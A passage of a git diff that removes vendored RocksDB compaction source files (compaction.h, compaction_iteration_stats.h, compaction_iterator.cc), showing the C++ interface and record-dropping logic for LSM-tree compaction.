-  return cfd_->ioptions()->compaction_filter_factory->CreateCompactionFilter(
-      context);
-}
-
-bool Compaction::IsOutputLevelEmpty() const {
-  return inputs_.back().level != output_level_ || inputs_.back().empty();
-}
-
-bool Compaction::ShouldFormSubcompactions() const {
-  if (immutable_cf_options_.max_subcompactions <= 1 || cfd_ == nullptr) {
-    return false;
-  }
-  if (cfd_->ioptions()->compaction_style == kCompactionStyleLevel) {
-    return start_level_ == 0 && output_level_ > 0 && !IsOutputLevelEmpty();
-  } else if (cfd_->ioptions()->compaction_style == kCompactionStyleUniversal) {
-    return number_levels_ > 1 && output_level_ > 0;
-  } else {
-    return false;
-  }
-}
-
-uint64_t Compaction::MaxInputFileCreationTime() const {
-  uint64_t max_creation_time = 0;
-  for (const auto& file : inputs_[0].files) {
-    if (file->fd.table_reader != nullptr &&
-        file->fd.table_reader->GetTableProperties() != nullptr) {
-      uint64_t creation_time =
-          file->fd.table_reader->GetTableProperties()->creation_time;
-      max_creation_time = std::max(max_creation_time, creation_time);
-    }
-  }
-  return max_creation_time;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/compaction.h b/thirdparty/rocksdb/db/compaction.h
deleted file mode 100644
index 7be6df2..0000000
--- a/thirdparty/rocksdb/db/compaction.h
+++ /dev/null
@@ -1,325 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include "db/version_set.h"
-#include "options/cf_options.h"
-#include "util/arena.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-// The structure that manages compaction input files associated
-// with the same physical level.
-struct CompactionInputFiles {
-  int level;
-  std::vector<FileMetaData*> files;
-  inline bool empty() const { return files.empty(); }
-  inline size_t size() const { return files.size(); }
-  inline void clear() { files.clear(); }
-  inline FileMetaData* operator[](size_t i) const { return files[i]; }
-};
-
-class Version;
-class ColumnFamilyData;
-class VersionStorageInfo;
-class CompactionFilter;
-
-// A Compaction encapsulates information about a compaction.
-class Compaction {
- public:
-  Compaction(VersionStorageInfo* input_version,
-             const ImmutableCFOptions& immutable_cf_options,
-             const MutableCFOptions& mutable_cf_options,
-             std::vector<CompactionInputFiles> inputs, int output_level,
-             uint64_t target_file_size, uint64_t max_compaction_bytes,
-             uint32_t output_path_id, CompressionType compression,
-             std::vector<FileMetaData*> grandparents,
-             bool manual_compaction = false, double score = -1,
-             bool deletion_compaction = false,
-             CompactionReason compaction_reason = CompactionReason::kUnknown);
-
-  // No copying allowed
-  Compaction(const Compaction&) = delete;
-  void operator=(const Compaction&) = delete;
-
-  ~Compaction();
-
-  // Returns the level associated to the specified compaction input level.
-  // If compaction_input_level is not specified, then input_level is set to 0.
-  int level(size_t compaction_input_level = 0) const {
-    return inputs_[compaction_input_level].level;
-  }
-
-  int start_level() const { return start_level_; }
-
-  // Outputs will go to this level
-  int output_level() const { return output_level_; }
-
-  // Returns the number of input levels in this compaction.
-  size_t num_input_levels() const { return inputs_.size(); }
-
-  // Return the object that holds the edits to the descriptor done
-  // by this compaction.
-  VersionEdit* edit() { return &edit_; }
-
-  // Returns the number of input files associated to the specified
-  // compaction input level.
-  // The function will return 0 if when "compaction_input_level" < 0
-  // or "compaction_input_level" >= "num_input_levels()".
-  size_t num_input_files(size_t compaction_input_level) const {
-    if (compaction_input_level < inputs_.size()) {
-      return inputs_[compaction_input_level].size();
-    }
-    return 0;
-  }
-
-  // Returns input version of the compaction
-  Version* input_version() const { return input_version_; }
-
-  // Returns the ColumnFamilyData associated with the compaction.
-  ColumnFamilyData* column_family_data() const { return cfd_; }
-
-  // Returns the file meta data of the 'i'th input file at the
-  // specified compaction input level.
-  // REQUIREMENT: "compaction_input_level" must be >= 0 and
-  //              < "input_levels()"
-  FileMetaData* input(size_t compaction_input_level, size_t i) const {
-    assert(compaction_input_level < inputs_.size());
-    return inputs_[compaction_input_level][i];
-  }
-
-  // Returns the list of file meta data of the specified compaction
-  // input level.
-  // REQUIREMENT: "compaction_input_level" must be >= 0 and
-  //              < "input_levels()"
-  const std::vector<FileMetaData*>* inputs(
-      size_t compaction_input_level) const {
-    assert(compaction_input_level < inputs_.size());
-    return &inputs_[compaction_input_level].files;
-  }
-
-  const std::vector<CompactionInputFiles>* inputs() { return &inputs_; }
-
-  // Returns the LevelFilesBrief of the specified compaction input level.
-  const LevelFilesBrief* input_levels(size_t compaction_input_level) const {
-    return &input_levels_[compaction_input_level];
-  }
-
-  // Maximum size of files to build during this compaction.
-  uint64_t max_output_file_size() const { return max_output_file_size_; }
-
-  // What compression for output
-  CompressionType output_compression() const { return output_compression_; }
-
-  // Whether need to write output file to second DB path.
-  uint32_t output_path_id() const { return output_path_id_; }
-
-  // Is this a trivial compaction that can be implemented by just
-  // moving a single input file to the next level (no merging or splitting)
-  bool IsTrivialMove() const;
-
-  // If true, then the compaction can be done by simply deleting input files.
-  bool deletion_compaction() const { return deletion_compaction_; }
-
-  // Add all inputs to this compaction as delete operations to *edit.
-  void AddInputDeletions(VersionEdit* edit);
-
-  // Returns true if the available information we have guarantees that
-  // the input "user_key" does not exist in any level beyond "output_level()".
-  bool KeyNotExistsBeyondOutputLevel(const Slice& user_key,
-                                     std::vector<size_t>* level_ptrs) const;
-
-  // Clear all files to indicate that they are not being compacted
-  // Delete this compaction from the list of running compactions.
-  //
-  // Requirement: DB mutex held
-  void ReleaseCompactionFiles(Status status);
-
-  // Returns the summary of the compaction in "output" with maximum "len"
-  // in bytes.  The caller is responsible for the memory management of
-  // "output".
-  void Summary(char* output, int len);
-
-  // Return the score that was used to pick this compaction run.
-  double score() const { return score_; }
-
-  // Is this compaction creating a file in the bottom most level?
-  bool bottommost_level() const { return bottommost_level_; }
-
-  // Does this compaction include all sst files?
-  bool is_full_compaction() const { return is_full_compaction_; }
-
-  // Was this compaction triggered manually by the client?
-  bool is_manual_compaction() const { return is_manual_compaction_; }
-
-  // Used when allow_trivial_move option is set in
-  // Universal compaction. If all the input files are
-  // non overlapping, then is_trivial_move_ variable
-  // will be set true, else false
-  void set_is_trivial_move(bool trivial_move) {
-    is_trivial_move_ = trivial_move;
-  }
-
-  // Used when allow_trivial_move option is set in
-  // Universal compaction. Returns true, if the input files
-  // are non-overlapping and can be trivially moved.
-  bool is_trivial_move() const { return is_trivial_move_; }
-
-  // How many total levels are there?
-  int number_levels() const { return number_levels_; }
-
-  // Return the ImmutableCFOptions that should be used throughout the compaction
-  // procedure
-  const ImmutableCFOptions* immutable_cf_options() const {
-    return &immutable_cf_options_;
-  }
-
-  // Return the MutableCFOptions that should be used throughout the compaction
-  // procedure
-  const MutableCFOptions* mutable_cf_options() const {
-    return &mutable_cf_options_;
-  }
-
-  // Returns the size in bytes that the output file should be preallocated to.
-  // In level compaction, that is max_file_size_. In universal compaction, that
-  // is the sum of all input file sizes.
-  uint64_t OutputFilePreallocationSize() const;
-
-  void SetInputVersion(Version* input_version);
-
-  struct InputLevelSummaryBuffer {
-    char buffer[128];
-  };
-
-  const char* InputLevelSummary(InputLevelSummaryBuffer* scratch) const;
-
-  uint64_t CalculateTotalInputSize() const;
-
-  // In case of compaction error, reset the nextIndex that is used
-  // to pick up the next file to be compacted from files_by_size_
-  void ResetNextCompactionIndex();
-
-  // Create a CompactionFilter from compaction_filter_factory
-  std::unique_ptr<CompactionFilter> CreateCompactionFilter() const;
-
-  // Is the input level corresponding to output_level_ empty?
-  bool IsOutputLevelEmpty() const;
-
-  // Should this compaction be broken up into smaller ones run in parallel?
-  bool ShouldFormSubcompactions() const;
-
-  // test function to validate the functionality of IsBottommostLevel()
-  // function -- determines if compaction with inputs and storage is bottommost
-  static bool TEST_IsBottommostLevel(
-      int output_level, VersionStorageInfo* vstorage,
-      const std::vector<CompactionInputFiles>& inputs);
-
-  TablePropertiesCollection GetOutputTableProperties() const {
-    return output_table_properties_;
-  }
-
-  void SetOutputTableProperties(TablePropertiesCollection tp) {
-    output_table_properties_ = std::move(tp);
-  }
-
-  Slice GetSmallestUserKey() const { return smallest_user_key_; }
-
-  Slice GetLargestUserKey() const { return largest_user_key_; }
-
-  CompactionReason compaction_reason() { return compaction_reason_; }
-
-  const std::vector<FileMetaData*>& grandparents() const {
-    return grandparents_;
-  }
-
-  uint64_t max_compaction_bytes() const { return max_compaction_bytes_; }
-
-  uint64_t MaxInputFileCreationTime() const;
-
- private:
-  // mark (or clear) all files that are being compacted
-  void MarkFilesBeingCompacted(bool mark_as_compacted);
-
-  // get the smallest and largest key present in files to be compacted
-  static void GetBoundaryKeys(VersionStorageInfo* vstorage,
-                              const std::vector<CompactionInputFiles>& inputs,
-                              Slice* smallest_key, Slice* largest_key);
-
-  // helper function to determine if compaction with inputs and storage is
-  // bottommost
-  static bool IsBottommostLevel(
-      int output_level, VersionStorageInfo* vstorage,
-      const std::vector<CompactionInputFiles>& inputs);
-
-  static bool IsFullCompaction(VersionStorageInfo* vstorage,
-                               const std::vector<CompactionInputFiles>& inputs);
-
-  VersionStorageInfo* input_vstorage_;
-
-  const int start_level_;    // the lowest level to be compacted
-  const int output_level_;  // levels to which output files are stored
-  uint64_t max_output_file_size_;
-  uint64_t max_compaction_bytes_;
-  const ImmutableCFOptions immutable_cf_options_;
-  const MutableCFOptions mutable_cf_options_;
-  Version* input_version_;
-  VersionEdit edit_;
-  const int number_levels_;
-  ColumnFamilyData* cfd_;
-  Arena arena_;          // Arena used to allocate space for file_levels_
-
-  const uint32_t output_path_id_;
-  CompressionType output_compression_;
-  // If true, then the comaction can be done by simply deleting input files.
-  const bool deletion_compaction_;
-
-  // Compaction input files organized by level. Constant after construction
-  const std::vector<CompactionInputFiles> inputs_;
-
-  // A copy of inputs_, organized more closely in memory
-  autovector<LevelFilesBrief, 2> input_levels_;
-
-  // State used to check for number of overlapping grandparent files
-  // (grandparent == "output_level_ + 1")
-  std::vector<FileMetaData*> grandparents_;
-  const double score_;         // score that was used to pick this compaction.
-
-  // Is this compaction creating a file in the bottom most level?
-  const bool bottommost_level_;
-  // Does this compaction include all sst files?
-  const bool is_full_compaction_;
-
-  // Is this compaction requested by the client?
-  const bool is_manual_compaction_;
-
-  // True if we can do trivial move in Universal multi level
-  // compaction
-  bool is_trivial_move_;
-
-  // Does input compression match the output compression?
-  bool InputCompressionMatchesOutput() const;
-
-  // table properties of output files
-  TablePropertiesCollection output_table_properties_;
-
-  // smallest user keys in compaction
-  Slice smallest_user_key_;
-
-  // largest user keys in compaction
-  Slice largest_user_key_;
-
-  // Reason for compaction
-  CompactionReason compaction_reason_;
-};
-
-// Utility function
-extern uint64_t TotalFileSize(const std::vector<FileMetaData*>& files);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/compaction_iteration_stats.h b/thirdparty/rocksdb/db/compaction_iteration_stats.h
deleted file mode 100644
index ddb5346..0000000
--- a/thirdparty/rocksdb/db/compaction_iteration_stats.h
+++ /dev/null
@@ -1,35 +0,0 @@
-//  Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-struct CompactionIterationStats {
-  // Compaction statistics
-
-  // Doesn't include records skipped because of
-  // CompactionFilter::Decision::kRemoveAndSkipUntil.
-  int64_t num_record_drop_user = 0;
-
-  int64_t num_record_drop_hidden = 0;
-  int64_t num_record_drop_obsolete = 0;
-  int64_t num_record_drop_range_del = 0;
-  int64_t num_range_del_drop_obsolete = 0;
-  // Deletions obsoleted before bottom level due to file gap optimization.
-  int64_t num_optimized_del_drop_obsolete = 0;
-  uint64_t total_filter_time = 0;
-
-  // Input statistics
-  // TODO(noetzli): The stats are incomplete. They are lacking everything
-  // consumed by MergeHelper.
-  uint64_t num_input_records = 0;
-  uint64_t num_input_deletion_records = 0;
-  uint64_t num_input_corrupt_records = 0;
-  uint64_t total_input_raw_key_bytes = 0;
-  uint64_t total_input_raw_value_bytes = 0;
-
-  // Single-Delete diagnostics for exceptional situations
-  uint64_t num_single_del_fallthru = 0;
-  uint64_t num_single_del_mismatch = 0;
-};
diff --git a/thirdparty/rocksdb/db/compaction_iterator.cc b/thirdparty/rocksdb/db/compaction_iterator.cc
deleted file mode 100644
index ae63f04..0000000
--- a/thirdparty/rocksdb/db/compaction_iterator.cc
+++ /dev/null
@@ -1,588 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/compaction_iterator.h"
-#include "rocksdb/listener.h"
-#include "table/internal_iterator.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-CompactionEventListener::CompactionListenerValueType fromInternalValueType(
-    ValueType vt) {
-  switch (vt) {
-    case kTypeDeletion:
-      return CompactionEventListener::CompactionListenerValueType::kDelete;
-    case kTypeValue:
-      return CompactionEventListener::CompactionListenerValueType::kValue;
-    case kTypeMerge:
-      return CompactionEventListener::CompactionListenerValueType::
-          kMergeOperand;
-    case kTypeSingleDeletion:
-      return CompactionEventListener::CompactionListenerValueType::
-          kSingleDelete;
-    case kTypeRangeDeletion:
-      return CompactionEventListener::CompactionListenerValueType::kRangeDelete;
-    case kTypeBlobIndex:
-      return CompactionEventListener::CompactionListenerValueType::kBlobIndex;
-    default:
-      assert(false);
-      return CompactionEventListener::CompactionListenerValueType::kInvalid;
-  }
-}
-#endif  // ROCKSDB_LITE
-
-CompactionIterator::CompactionIterator(
-    InternalIterator* input, const Comparator* cmp, MergeHelper* merge_helper,
-    SequenceNumber last_sequence, std::vector<SequenceNumber>* snapshots,
-    SequenceNumber earliest_write_conflict_snapshot, Env* env,
-    bool expect_valid_internal_key, RangeDelAggregator* range_del_agg,
-    const Compaction* compaction, const CompactionFilter* compaction_filter,
-    CompactionEventListener* compaction_listener,
-    const std::atomic<bool>* shutting_down)
-    : CompactionIterator(
-          input, cmp, merge_helper, last_sequence, snapshots,
-          earliest_write_conflict_snapshot, env, expect_valid_internal_key,
-          range_del_agg,
-          std::unique_ptr<CompactionProxy>(
-              compaction ? new CompactionProxy(compaction) : nullptr),
-          compaction_filter, compaction_listener, shutting_down) {}
-
-CompactionIterator::CompactionIterator(
-    InternalIterator* input, const Comparator* cmp, MergeHelper* merge_helper,
-    SequenceNumber last_sequence, std::vector<SequenceNumber>* snapshots,
-    SequenceNumber earliest_write_conflict_snapshot, Env* env,
-    bool expect_valid_internal_key, RangeDelAggregator* range_del_agg,
-    std::unique_ptr<CompactionProxy> compaction,
-    const CompactionFilter* compaction_filter,
-    CompactionEventListener* compaction_listener,
-    const std::atomic<bool>* shutting_down)
-    : input_(input),
-      cmp_(cmp),
-      merge_helper_(merge_helper),
-      snapshots_(snapshots),
-      earliest_write_conflict_snapshot_(earliest_write_conflict_snapshot),
-      env_(env),
-      expect_valid_internal_key_(expect_valid_internal_key),
-      range_del_agg_(range_del_agg),
-      compaction_(std::move(compaction)),
-      compaction_filter_(compaction_filter),
-#ifndef ROCKSDB_LITE
-      compaction_listener_(compaction_listener),
-#endif  // ROCKSDB_LITE
-      shutting_down_(shutting_down),
-      ignore_snapshots_(false),
-      merge_out_iter_(merge_helper_) {
-  assert(compaction_filter_ == nullptr || compaction_ != nullptr);
-  bottommost_level_ =
-      compaction_ == nullptr ? false : compaction_->bottommost_level();
-  if (compaction_ != nullptr) {
-    level_ptrs_ = std::vector<size_t>(compaction_->number_levels(), 0);
-  }
-
-  if (snapshots_->size() == 0) {
-    // optimize for fast path if there are no snapshots
-    visible_at_tip_ = true;
-    earliest_snapshot_ = kMaxSequenceNumber;
-    latest_snapshot_ = 0;
-  } else {
-    visible_at_tip_ = false;
-    earliest_snapshot_ = snapshots_->at(0);
-    latest_snapshot_ = snapshots_->back();
-  }
-  if (compaction_filter_ != nullptr) {
-    if (compaction_filter_->IgnoreSnapshots()) {
-      ignore_snapshots_ = true;
-    }
-  } else {
-    ignore_snapshots_ = false;
-  }
-  input_->SetPinnedItersMgr(&pinned_iters_mgr_);
-}
-
-CompactionIterator::~CompactionIterator() {
-  // input_ Iteartor lifetime is longer than pinned_iters_mgr_ lifetime
-  input_->SetPinnedItersMgr(nullptr);
-}
-
-void CompactionIterator::ResetRecordCounts() {
-  iter_stats_.num_record_drop_user = 0;
-  iter_stats_.num_record_drop_hidden = 0;
-  iter_stats_.num_record_drop_obsolete = 0;
-  iter_stats_.num_record_drop_range_del = 0;
-  iter_stats_.num_range_del_drop_obsolete = 0;
-  iter_stats_.num_optimized_del_drop_obsolete = 0;
-}
-
-void CompactionIterator::SeekToFirst() {
-  NextFromInput();
-  PrepareOutput();
-}
-
-void CompactionIterator::Next() {
-  // If there is a merge output, return it before continuing to process the
-  // input.
-  if (merge_out_iter_.Valid()) {
-    merge_out_iter_.Next();
-
-    // Check if we returned all records of the merge output.
-    if (merge_out_iter_.Valid()) {
-      key_ = merge_out_iter_.key();
-      value_ = merge_out_iter_.value();
-      bool valid_key __attribute__((__unused__)) =
-          ParseInternalKey(key_, &ikey_);
-      // MergeUntil stops when it encounters a corrupt key and does not
-      // include them in the result, so we expect the keys here to be valid.
-      assert(valid_key);
-      // Keep current_key_ in sync.
-      current_key_.UpdateInternalKey(ikey_.sequence, ikey_.type);
-      key_ = current_key_.GetInternalKey();
-      ikey_.user_key = current_key_.GetUserKey();
-      valid_ = true;
-    } else {
-      // We consumed all pinned merge operands, release pinned iterators
-      pinned_iters_mgr_.ReleasePinnedData();
-      // MergeHelper moves the iterator to the first record after the merged
-      // records, so even though we reached the end of the merge output, we do
-      // not want to advance the iterator.
-      NextFromInput();
-    }
-  } else {
-    // Only advance the input iterator if there is no merge output and the
-    // iterator is not already at the next record.
-    if (!at_next_) {
-      input_->Next();
-    }
-    NextFromInput();
-  }
-
-  if (valid_) {
-    // Record that we've outputted a record for the current key.
-    has_outputted_key_ = true;
-  }
-
-  PrepareOutput();
-}
-
-void CompactionIterator::NextFromInput() {
-  at_next_ = false;
-  valid_ = false;
-
-  while (!valid_ && input_->Valid() && !IsShuttingDown()) {
-    key_ = input_->key();
-    value_ = input_->value();
-    iter_stats_.num_input_records++;
-
-    if (!ParseInternalKey(key_, &ikey_)) {
-      // If `expect_valid_internal_key_` is false, return the corrupted key
-      // and let the caller decide what to do with it.
-      // TODO(noetzli): We should have a more elegant solution for this.
-      if (expect_valid_internal_key_) {
-        assert(!"Corrupted internal key not expected.");
-        status_ = Status::Corruption("Corrupted internal key not expected.");
-        break;
-      }
-      key_ = current_key_.SetInternalKey(key_);
-      has_current_user_key_ = false;
-      current_user_key_sequence_ = kMaxSequenceNumber;
-      current_user_key_snapshot_ = 0;
-      iter_stats_.num_input_corrupt_records++;
-      valid_ = true;
-      break;
-    }
-
-    // Update input statistics
-    if (ikey_.type == kTypeDeletion || ikey_.type == kTypeSingleDeletion) {
-      iter_stats_.num_input_deletion_records++;
-    }
-    iter_stats_.total_input_raw_key_bytes += key_.size();
-    iter_stats_.total_input_raw_value_bytes += value_.size();
-
-    // If need_skip is true, we should seek the input iterator
-    // to internal key skip_until and continue from there.
-    bool need_skip = false;
-    // Points either into compaction_filter_skip_until_ or into
-    // merge_helper_->compaction_filter_skip_until_.
-    Slice skip_until;
-
-    // Check whether the user key changed. After this if statement current_key_
-    // is a copy of the current input key (maybe converted to a delete by the
-    // compaction filter). ikey_.user_key is pointing to the copy.
-    if (!has_current_user_key_ ||
-        !cmp_->Equal(ikey_.user_key, current_user_key_)) {
-      // First occurrence of this user key
-      // Copy key for output
-      key_ = current_key_.SetInternalKey(key_, &ikey_);
-      current_user_key_ = ikey_.user_key;
-      has_current_user_key_ = true;
-      has_outputted_key_ = false;
-      current_user_key_sequence_ = kMaxSequenceNumber;
-      current_user_key_snapshot_ = 0;
-
-#ifndef ROCKSDB_LITE
-      if (compaction_listener_) {
-        compaction_listener_->OnCompaction(compaction_->level(), ikey_.user_key,
-                                           fromInternalValueType(ikey_.type),
-                                           value_, ikey_.sequence, true);
-      }
-#endif  // ROCKSDB_LITE
-
-      // apply the compaction filter to the first occurrence of the user key
-      if (compaction_filter_ != nullptr && 
-          (ikey_.type == kTypeValue || ikey_.type == kTypeBlobIndex) &&
-          (visible_at_tip_ || ikey_.sequence > latest_snapshot_ ||
-           ignore_snapshots_)) {
-        // If the user has specified a compaction filter and the sequence
-        // number is greater than any external snapshot, then invoke the
-        // filter. If the return value of the compaction filter is true,
-        // replace the entry with a deletion marker.
-        CompactionFilter::Decision filter;
-        compaction_filter_value_.clear();
-        compaction_filter_skip_until_.Clear();
-        CompactionFilter::ValueType value_type =
-            ikey_.type == kTypeValue ? CompactionFilter::ValueType::kValue
-                                     : CompactionFilter::ValueType::kBlobIndex;
-        {
-          StopWatchNano timer(env_, true);
-          filter = compaction_filter_->FilterV2(
-              compaction_->level(), ikey_.user_key, value_type, value_,
-              &compaction_filter_value_, compaction_filter_skip_until_.rep());
-          iter_stats_.total_filter_time +=
-              env_ != nullptr ? timer.ElapsedNanos() : 0;
-        }
-
-        if (filter == CompactionFilter::Decision::kRemoveAndSkipUntil &&
-            cmp_->Compare(*compaction_filter_skip_until_.rep(),
-                          ikey_.user_key) <= 0) {
-          // Can't skip to a key smaller than the current one.
-          // Keep the key as per FilterV2 documentation.
-          filter = CompactionFilter::Decision::kKeep;
-        }
-
-        if (filter == CompactionFilter::Decision::kRemove) {
-          // convert the current key to a delete; key_ is pointing into
-          // current_key_ at this point, so updating current_key_ updates key()
-          ikey_.type = kTypeDeletion;
-          current_key_.UpdateInternalKey(ikey_.sequence, kTypeDeletion);
-          // no value associated with delete
-          value_.clear();
-          iter_stats_.num_record_drop_user++;
-        } else if (filter == CompactionFilter::Decision::kChangeValue) {
-          value_ = compaction_filter_value_;
-        } else if (filter == CompactionFilter::Decision::kRemoveAndSkipUntil) {
-          need_skip = true;
-          compaction_filter_skip_until_.ConvertFromUserKey(kMaxSequenceNumber,
-                                                           kValueTypeForSeek);
-          skip_until = compaction_filter_skip_until_.Encode();
-        }
-      }
-    } else {
-#ifndef ROCKSDB_LITE
-      if (compaction_listener_) {
-        compaction_listener_->OnCompaction(compaction_->level(), ikey_.user_key,
-                                           fromInternalValueType(ikey_.type),
-                                           value_, ikey_.sequence, false);
-      }
-#endif  // ROCKSDB_LITE
-
-      // Update the current key to reflect the new sequence number/type without
-      // copying the user key.
-      // TODO(rven): Compaction filter does not process keys in this path
-      // Need to have the compaction filter process multiple versions
-      // if we have versions on both sides of a snapshot
-      current_key_.UpdateInternalKey(ikey_.sequence, ikey_.type);
-      key_ = current_key_.GetInternalKey();
-      ikey_.user_key = current_key_.GetUserKey();
-    }
-
-    // If there are no snapshots, then this kv affect visibility at tip.
-    // Otherwise, search though all existing snapshots to find the earliest
-    // snapshot that is affected by this kv.
-    SequenceNumber last_sequence __attribute__((__unused__)) =
-        current_user_key_sequence_;
-    current_user_key_sequence_ = ikey_.sequence;
-    SequenceNumber last_snapshot = current_user_key_snapshot_;
-    SequenceNumber prev_snapshot = 0;  // 0 means no previous snapshot
-    current_user_key_snapshot_ =
-        visible_at_tip_
-            ? earliest_snapshot_
-            : findEarliestVisibleSnapshot(ikey_.sequence, &prev_snapshot);
-
-    if (need_skip) {
-      // This case is handled below.
-    } else if (clear_and_output_next_key_) {
-      // In the previous iteration we encountered a single delete that we could
-      // not compact out.  We will keep this Put, but can drop it's data.
-      // (See Optimization 3, below.)
-      assert(ikey_.type == kTypeValue);
-      assert(current_user_key_snapshot_ == last_snapshot);
-
-      value_.clear();
-      valid_ = true;
-      clear_and_output_next_key_ = false;
-    } else if (ikey_.type == kTypeSingleDeletion) {
-      // We can compact out a SingleDelete if:
-      // 1) We encounter the corresponding PUT -OR- we know that this key
-      //    doesn't appear past this output level
-      // =AND=
-      // 2) We've already returned a record in this snapshot -OR-
-      //    there are no earlier earliest_write_conflict_snapshot.
-      //
-      // Rule 1 is needed for SingleDelete correctness.  Rule 2 is needed to
-      // allow Transactions to do write-conflict checking (if we compacted away
-      // all keys, then we wouldn't know that a write happened in this
-      // snapshot).  If there is no earlier snapshot, then we know that there
-      // are no active transactions that need to know about any writes.
-      //
-      // Optimization 3:
-      // If we encounter a SingleDelete followed by a PUT and Rule 2 is NOT
-      // true, then we must output a SingleDelete.  In this case, we will decide
-      // to also output the PUT.  While we are compacting less by outputting the
-      // PUT now, hopefully this will lead to better compaction in the future
-      // when Rule 2 is later true (Ie, We are hoping we can later compact out
-      // both the SingleDelete and the Put, while we couldn't if we only
-      // outputted the SingleDelete now).
-      // In this case, we can save space by removing the PUT's value as it will
-      // never be read.
-      //
-      // Deletes and Merges are not supported on the same key that has a
-      // SingleDelete as it is not possible to correctly do any partial
-      // compaction of such a combination of operations.  The result of mixing
-      // those operations for a given key is documented as being undefined.  So
-      // we can choose how to handle such a combinations of operations.  We will
-      // try to compact out as much as we can in these cases.
-      // We will report counts on these anomalous cases.
-
-      // The easiest way to process a SingleDelete during iteration is to peek
-      // ahead at the next key.
-      ParsedInternalKey next_ikey;
-      input_->Next();
-
-      // Check whether the next key exists, is not corrupt, and is the same key
-      // as the single delete.
-      if (input_->Valid() && ParseInternalKey(input_->key(), &next_ikey) &&
-          cmp_->Equal(ikey_.user_key, next_ikey.user_key)) {
-        // Check whether the next key belongs to the same snapshot as the
-        // SingleDelete.
-        if (prev_snapshot == 0 || next_ikey.sequence > prev_snapshot) {
-          if (next_ikey.type == kTypeSingleDeletion) {
-            // We encountered two SingleDeletes in a row.  This could be due to
-            // unexpected user input.
-            // Skip the first SingleDelete and let the next iteration decide how
-            // to handle the second SingleDelete
-
-            // First SingleDelete has been skipped since we already called
-            // input_->Next().
-            ++iter_stats_.num_record_drop_obsolete;
-            ++iter_stats_.num_single_del_mismatch;
-          } else if ((ikey_.sequence <= earliest_write_conflict_snapshot_) ||
-                     has_outputted_key_) {
-            // Found a matching value, we can drop the single delete and the
-            // value.  It is safe to drop both records since we've already
-            // outputted a key in this snapshot, or there is no earlier
-            // snapshot (Rule 2 above).
-
-            // Note: it doesn't matter whether the second key is a Put or if it
-            // is an unexpected Merge or Delete.  We will compact it out
-            // either way. We will maintain counts of how many mismatches
-            // happened
-            if (next_ikey.type != kTypeValue) {
-              ++iter_stats_.num_single_del_mismatch;
-            }
-
-            ++iter_stats_.num_record_drop_hidden;
-            ++iter_stats_.num_record_drop_obsolete;
-            // Already called input_->Next() once.  Call it a second time to
-            // skip past the second key.
-            input_->Next();
-          } else {
-            // Found a matching value, but we cannot drop both keys since
-            // there is an earlier snapshot and we need to leave behind a record
-            // to know that a write happened in this snapshot (Rule 2 above).
-            // Clear the value and output the SingleDelete. (The value will be
-            // outputted on the next iteration.)
-
-            // Setting valid_ to true will output the current SingleDelete
-            valid_ = true;
-
-            // Set up the Put to be outputted in the next iteration.
-            // (Optimization 3).
-            clear_and_output_next_key_ = true;
-          }
-        } else {
-          // We hit the next snapshot without hitting a put, so the iterator
-          // returns the single delete.
-          valid_ = true;
-        }
-      } else {
-        // We are at the end of the input, could not parse the next key, or hit
-        // a different key. The iterator returns the single delete if the key
-        // possibly exists beyond the current output level.  We set
-        // has_current_user_key to false so that if the iterator is at the next
-        // key, we do not compare it again against the previous key at the next
-        // iteration. If the next key is corrupt, we return before the
-        // comparison, so the value of has_current_user_key does not matter.
-        has_current_user_key_ = false;
-        if (compaction_ != nullptr && ikey_.sequence <= earliest_snapshot_ &&
-            compaction_->KeyNotExistsBeyondOutputLevel(ikey_.user_key,
-                                                       &level_ptrs_)) {
-          // Key doesn't exist outside of this range.
-          // Can compact out this SingleDelete.
-          ++iter_stats_.num_record_drop_obsolete;
-          ++iter_stats_.num_single_del_fallthru;
-          if (!bottommost_level_) {
-            ++iter_stats_.num_optimized_del_drop_obsolete;
-          }
-        } else {
-          // Output SingleDelete
-          valid_ = true;
-        }
-      }
-
-      if (valid_) {
-        at_next_ = true;
-      }
-    } else if (last_snapshot == current_user_key_snapshot_) {
-      // If the earliest snapshot is which this key is visible in
-      // is the same as the visibility of a previous instance of the
-      // same key, then this kv is not visible in any snapshot.
-      // Hidden by an newer entry for same user key
-      // TODO(noetzli): why not > ?
-      //
-      // Note: Dropping this key will not affect TransactionDB write-conflict
-      // checking since there has already been a record returned for this key
-      // in this snapshot.
-      assert(last_sequence >= current_user_key_sequence_);
-      ++iter_stats_.num_record_drop_hidden;  // (A)
-      input_->Next();
-    } else if (compaction_ != nullptr && ikey_.type == kTypeDeletion &&
-               ikey_.sequence <= earliest_snapshot_ &&
-               compaction_->KeyNotExistsBeyondOutputLevel(ikey_.user_key,
-                                                          &level_ptrs_)) {
-      // TODO(noetzli): This is the only place where we use compaction_
-      // (besides the constructor). We should probably get rid of this
-      // dependency and find a way to do similar filtering during flushes.
-      //
-      // For this user key:
-      // (1) there is no data in higher levels
-      // (2) data in lower levels will have larger sequence numbers
-      // (3) data in layers that are being compacted here and have
-      //     smaller sequence numbers will be dropped in the next
-      //     few iterations of this loop (by rule (A) above).
-      // Therefore this deletion marker is obsolete and can be dropped.
-      //
-      // Note:  Dropping this Delete will not affect TransactionDB
-      // write-conflict checking since it is earlier than any snapshot.
-      ++iter_stats_.num_record_drop_obsolete;
-      if (!bottommost_level_) {
-        ++iter_stats_.num_optimized_del_drop_obsolete;
-      }
-      input_->Next();
-    } else if (ikey_.type == kTypeMerge) {
-      if (!merge_helper_->HasOperator()) {
